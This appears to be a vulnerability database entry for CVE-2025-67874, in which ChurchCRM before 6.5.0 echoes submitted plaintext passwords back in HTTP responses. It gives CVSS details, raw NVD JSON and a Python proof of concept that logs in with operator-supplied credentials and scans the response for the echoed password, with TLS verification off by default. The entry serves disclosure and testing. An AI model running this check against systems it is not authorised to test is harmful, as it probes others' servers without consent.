Security Vulnerability Report
CVE-2025-67874 CVSS 6.5 MEDIUM

CVE-2025-67874

Published: 2025-12-16 01:15:53
Last Modified: 2025-12-17 14:14:08

Description

ChurchCRM is an open-source church management system. Prior to version 6.5.0, the application echoes back plaintext passwords submitted by users in subsequent HTTP responses. This information disclosure significantly increases the risk of credential compromise and may amplify the impact of other vulnerabilities (e.g., XSS, IDOR, session fixation), enabling attackers to harvest other users’ passwords. Version 6.5.0 fixes the issue.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:* - VULNERABLE
ChurchCRM < 6.5.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
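# CVE-2025-67874 PoC - ChurchCRM Password Echo Information Disclosure
# This PoC demonstrates the password echo vulnerability in ChurchCRM < 6.5.0
#
# The check logs in with credentials the operator controls and then looks for
# that same password string in the HTTP response body. A hit means the server
# is reflecting submitted passwords back to the client; the remediation is to
# upgrade to ChurchCRM 6.5.0 or later.
import re

import requests
import urllib3
from urllib3.exceptions import InsecureRequestWarning

TARGET_URL = "https://target-churchcrm.com"
USERNAME = "[email protected]"
PASSWORD = "user_password"

# The original PoC hard-coded verify=False on every request. It is kept as the
# default here so behaviour is unchanged, but it is now a single switch: with
# verification off, the credentials above are sent to whatever answers for
# TARGET_URL, so set this to True (or a CA bundle path) outside a lab.
VERIFY_TLS = False

# Upper bound, in seconds, on how long a single HTTP round-trip may block.
# The original login POST had no timeout and could hang indefinitely.
REQUEST_TIMEOUT = 10

if VERIFY_TLS is False:
    # Only silence the InsecureRequestWarning when verification really is
    # off; requests.packages.urllib3 is a legacy alias, the module is
    # imported directly instead.
    urllib3.disable_warnings(InsecureRequestWarning)


def _password_patterns(password):
    """Return the regexes used to spot *password* echoed in a response body.

    These are the four patterns of the original PoC: a bare value attribute,
    a password-style key/value pair, an <input ... type="password"> element
    carrying the value, and a JSON "password" member. The password is passed
    through re.escape so regex metacharacters in it cannot alter the match.
    """
    escaped = re.escape(password)
    return [
        r'value=["\']{}["\']'.format(escaped),
        r'password["\s]*[:=]["\s]*["\']{}["\']'.format(escaped),
        r'<input[^>]*value=["\']{}["\'][^>]*type=["\']password["\']'.format(escaped),
        r'"password"\s*:\s*"{}"'.format(escaped),
    ]


def exploit_password_echo():
    """Log in with the configured credentials and test whether the submitted
    password is reflected in the login response.

    Returns:
        True if the plaintext password was found in the response body,
        False otherwise.

    Raises:
        requests.RequestException: if the login request itself fails
            (connection error, timeout, TLS failure, ...).
    """
    session = requests.Session()

    # Step 1: submit the login form. Redirects are not followed so the body
    # inspected is the one produced by the login handler itself.
    login_url = f"{TARGET_URL}/session/login"
    login_data = {"Username": USERNAME, "Password": PASSWORD}
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
    }
    print(f"[*] Attempting login with user: {USERNAME}")
    response = session.post(
        login_url,
        data=login_data,
        headers=headers,
        verify=VERIFY_TLS,
        allow_redirects=False,
        timeout=REQUEST_TIMEOUT,
    )

    # Step 2: search the body for our own password. Any single pattern hit is
    # enough; the response text is untrusted and only ever used as a regex
    # subject, never evaluated or rendered.
    body = response.text
    echoed = any(
        re.search(pattern, body, re.IGNORECASE)
        for pattern in _password_patterns(PASSWORD)
    )
    if echoed:
        print("[!] VULNERABLE: Plaintext password found in response!")
        # The original printed the password itself; the operator already
        # knows it, and writing it to stdout leaks it into terminal logs and
        # pasted reports, so only the fact of the echo is reported.
        print("[+] Password echoed in response body (value not printed)")
        print(f"[+] Response status: {response.status_code}")
        return True
    print("[*] No plaintext password echo detected (possibly patched)")
    return False


def check_version():
    """Ask the instance for its version via the ping endpoint.

    Returns:
        The version string reported by the instance ("unknown" if the JSON
        has no usable "version" member), or None if the endpoint could not
        be reached, did not answer 200, or did not return JSON.
    """
    version_url = f"{TARGET_URL}/api/system/ping"
    try:
        response = requests.get(version_url, verify=VERIFY_TLS, timeout=REQUEST_TIMEOUT)
        if response.status_code == 200:
            data = response.json()
            # Guard against a JSON body that is not an object; the original
            # relied on a blanket except to absorb the AttributeError.
            version = data.get("version", "unknown") if isinstance(data, dict) else "unknown"
            print(f"[*] ChurchCRM Version: {version}")
            return version
    except (requests.RequestException, ValueError) as e:
        # RequestException covers transport failures; ValueError is what
        # response.json() raises on a non-JSON body. Anything else is a
        # programming error and should surface rather than be swallowed.
        print(f"[*] Could not determine version: {e}")
    return None


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-67874 - ChurchCRM Password Echo PoC")
    print("=" * 60)
    # The version is already printed by check_version(); its return value
    # was previously bound to an unused local.
    check_version()
    exploit_password_echo()
    print("\n[*] Mitigation: Upgrade to ChurchCRM 6.5.0 or later")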

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67874", "sourceIdentifier": "[email protected]", "published": "2025-12-16T01:15:53.243", "lastModified": "2025-12-17T14:14:08.153", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ChurchCRM is an open-source church management system. Prior to version 6.5.0, the application echoes back plaintext passwords submitted by users in subsequent HTTP responses. This information disclosure significantly increases the risk of credential compromise and may amplify the impact of other vulnerabilities (e.g., XSS, IDOR, session fixation), enabling attackers to harvest other users’ passwords. Version 6.5.0 fixes the issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", 
"modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-204"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.5.0", "matchCriteriaId": "5A5441D8-981B-4308-AEF6-C0164766EA04"}]}]}], "references": [{"url": "https://github.com/ChurchCRM/CRM/commit/2d6cf7aed9af1b9b47e125d1a2266f8e2a88f3fd", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/ChurchCRM/CRM/security/advisories/GHSA-p98h-5xcj-5c6x", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}